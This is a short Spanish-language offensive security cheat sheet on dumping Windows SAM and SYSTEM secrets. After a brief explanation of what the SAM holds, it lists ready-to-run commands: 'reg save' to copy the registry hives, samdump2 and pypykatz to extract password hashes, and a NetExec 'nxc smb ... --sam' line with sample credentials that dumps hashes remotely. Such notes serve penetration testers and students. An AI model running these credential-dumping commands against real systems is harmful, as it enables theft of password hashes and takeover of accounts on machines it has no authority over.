SAM and SYSTEM

Introduction

La SAM (Security Account Manager) es una base de datos en Windows que almacena las credenciales locales de los usuarios, como los hashes de contraseñas. Este archivo crítico se encuentra en C:\Windows\System32\Config\SAM y está protegido por restricciones de acceso. Sin embargo, si un atacante obtiene permisos elevados, puede extraer los hashes de la SAM y usarlos para ataques como Pass-the-Hash o crackeo de contraseñas, comprometiendo cuentas locales del sistema.

---

Dumping SAM and SYSTEM secrets

Reg save

En Windows haremos una copia de los archivos en "temp"

reg save HKLM\SAM C:\Windows\temp\SAM

reg save HKLM\SYSTEM C:\Windows\temp\SYSTEM

Desde Kali Linux exportaremos los hashes de la SAM

samdump2 SYSTEM SAM

pypykatz registry --sam SAM SYSTEM 2>/dev/null

NetExec

De manera remota podemos hacer el dump del SAM del equipo.

nxc smb 10.99.99.10 -u 'usuer' -p 'Password01!' --sam

---

References

• Export copy SAM and SYSTEM files - https://juggernaut-sec.com/dumping-credentials-sam-file-hashes/#Extracting_a_Copy_of_Local_SAM_and_SYSTEM_Files_%E2%80%93_LOLBins